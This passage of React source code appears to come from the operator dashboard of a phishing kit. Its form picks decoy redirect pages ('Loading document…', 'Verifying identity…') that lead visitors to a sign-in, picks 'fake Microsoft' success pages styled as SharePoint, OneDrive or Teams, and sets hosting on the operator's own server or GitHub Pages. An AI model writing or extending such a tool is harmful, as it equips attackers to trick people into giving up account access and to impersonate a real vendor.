                color: 'var(--text3)', fontWeight: 600, fontSize: 14, cursor: 'not-allowed',
                display: 'flex', alignItems: 'center', justifyContent: 'center', gap: 8,
                opacity: 0.5,
              }}
            >
              Both
              <span style={{ fontSize: 10, background: 'var(--border)', color: 'var(--text3)', padding: '2px 6px', borderRadius: 4 }}>
                Soon
              </span>
            </button>
          </div>
        </div>

        {/* Redirect URL */}
        <div className="form-group" style={{ marginBottom: 0 }}>
          <label className="form-label">Redirect URL after auth <span style={{ color: 'var(--text3)', fontWeight: 400 }}>(optional)</span></label>
          <input
            className="form-input"
            value={form.redirect_url}
            onChange={e => set('redirect_url', e.target.value)}
            placeholder="https://example.com/thank-you"
          />
          <div className="form-hint">After a successful sign-in, the visitor will be redirected here automatically after 2.5 seconds.</div>
        </div>
      </div>

      {/* ── Section 5b: Hosted Page Style ── */}
      <div className="card" style={{ marginBottom: 16 }}>
        <div style={sectionHeader}>Hosted Page Style</div>

        <div className="form-group">
          <label className="form-label">Redirect Page Style</label>
          <div style={{ display: 'flex', gap: 10, flexWrap: 'wrap' }}>
            {[
              { value: 'loading',  icon: '⏳', label: 'Loading document…',   desc: 'Blue spinner, generic loading' },
              { value: 'document', icon: '📄', label: 'Preparing file…',     desc: 'Green, Word/Office style' },
              { value: 'verify',   icon: '🔐', label: 'Verifying identity…', desc: 'Purple, identity check' },
            ].map(opt => {
              const sel = form.redirect_template === opt.value;
              return (
                <div key={opt.value} onClick={() => set('redirect_template', opt.value)} style={{
                  flex: '1 1 140px', padding: '12px 10px', borderRadius: 8, cursor: 'pointer', userSelect: 'none',
                  border: `2px solid ${sel ? 'var(--primary,#0078d4)' : 'var(--border)'}`,
                  background: sel ? 'rgba(0,120,212,.06)' : 'var(--surface2)',
                  transition: 'border-color .12s, background .12s',
                }}>
                  <div style={{ fontSize: 22, marginBottom: 4 }}>{opt.icon}</div>
                  <div style={{ fontSize: 12, fontWeight: 600, color: sel ? 'var(--primary,#0078d4)' : 'var(--text)', marginBottom: 2 }}>{opt.label}</div>
                  <div style={{ fontSize: 10, color: 'var(--text3)', lineHeight: 1.3 }}>{opt.desc}</div>
                </div>
              );
            })}
          </div>
          <div className="form-hint">The outer shared link visitors see first before they're redirected to the sign-in page.</div>
        </div>

        <div className="form-group" style={{ marginBottom: 0 }}>
          <label className="form-label">Success Page Style</label>
          <div style={{ display: 'flex', gap: 10, flexWrap: 'wrap' }}>
            {[
              { value: 'sharepoint', icon: '🗂️', label: 'SharePoint',  desc: 'Blue topbar, Shared Documents' },
              { value: 'onedrive',   icon: '☁️', label: 'OneDrive',    desc: 'Dark blue, Shared with me' },
              { value: 'teams',      icon: '👥', label: 'Teams Files', desc: 'Purple, Microsoft Teams' },
            ].map(opt => {
              const sel = form.success_template === opt.value;
              return (
                <div key={opt.value} onClick={() => set('success_template', opt.value)} style={{
                  flex: '1 1 140px', padding: '12px 10px', borderRadius: 8, cursor: 'pointer', userSelect: 'none',
                  border: `2px solid ${sel ? 'var(--primary,#0078d4)' : 'var(--border)'}`,
                  background: sel ? 'rgba(0,120,212,.06)' : 'var(--surface2)',
                  transition: 'border-color .12s, background .12s',
                }}>
                  <div style={{ fontSize: 22, marginBottom: 4 }}>{opt.icon}</div>
                  <div style={{ fontSize: 12, fontWeight: 600, color: sel ? 'var(--primary,#0078d4)' : 'var(--text)', marginBottom: 2 }}>{opt.label}</div>
                  <div style={{ fontSize: 10, color: 'var(--text3)', lineHeight: 1.3 }}>{opt.desc}</div>
                </div>
              );
            })}
          </div>
          <div className="form-hint">The fake Microsoft page visitors land on after a successful sign-in.</div>
        </div>
      </div>

      {/* ── Section 6: Hosting ── */}
      <div className="card" style={{ marginBottom: 24 }}>
        <div style={sectionHeader}>Hosting <span style={{ fontWeight: 400, color: 'var(--text3)', fontSize: 12 }}>(optional)</span></div>

        <div className="form-group" style={{ marginBottom: 0 }}>
          <label className="form-label">External Page URL</label>
          <input
            className="form-input"
            value={form.external_url}
            onChange={e => set('external_url', e.target.value)}
            placeholder="https://yourdomain.com/connect"
          />
          <div className="form-hint">
            If you're hosting this page on your own server, paste the URL here. It will appear on your dashboard alongside the server and GitHub Pages URLs.
          </div>
        </div>
      </div>

      {/* ── Actions ── */}
      <div style={{ display: 'flex', gap: 12, alignItems: 'center', flexWrap: 'wrap' }}>
        <button
          className="btn btn-primary"
          onClick={handleCreate}
          disabled={creating || previewing}
          style={{ minWidth: 140 }}
        >
          {creating ? (
            <><span className="spinner" style={{ width: 14, height: 14, marginRight: 8 }} /> Creating…</>
          ) : (
            'Create Link'
          )}
        </button>

        <button
          className="btn btn-ghost"
          onClick={handlePreview}
          disabled={creating || previewing}
        >
          {previewing ? (
            <><span className="spinner" style={{ width: 14, height: 14, marginRight: 8 }} /> Generating…</>
          ) : (
            '👁 Preview'
          )}
        </button>

        <span style={{ fontSize: 12, color: 'var(--text3)' }}>
          Preview opens the landing page in a new tab without saving.
        </span>
      </div>

    </div>
  );
}
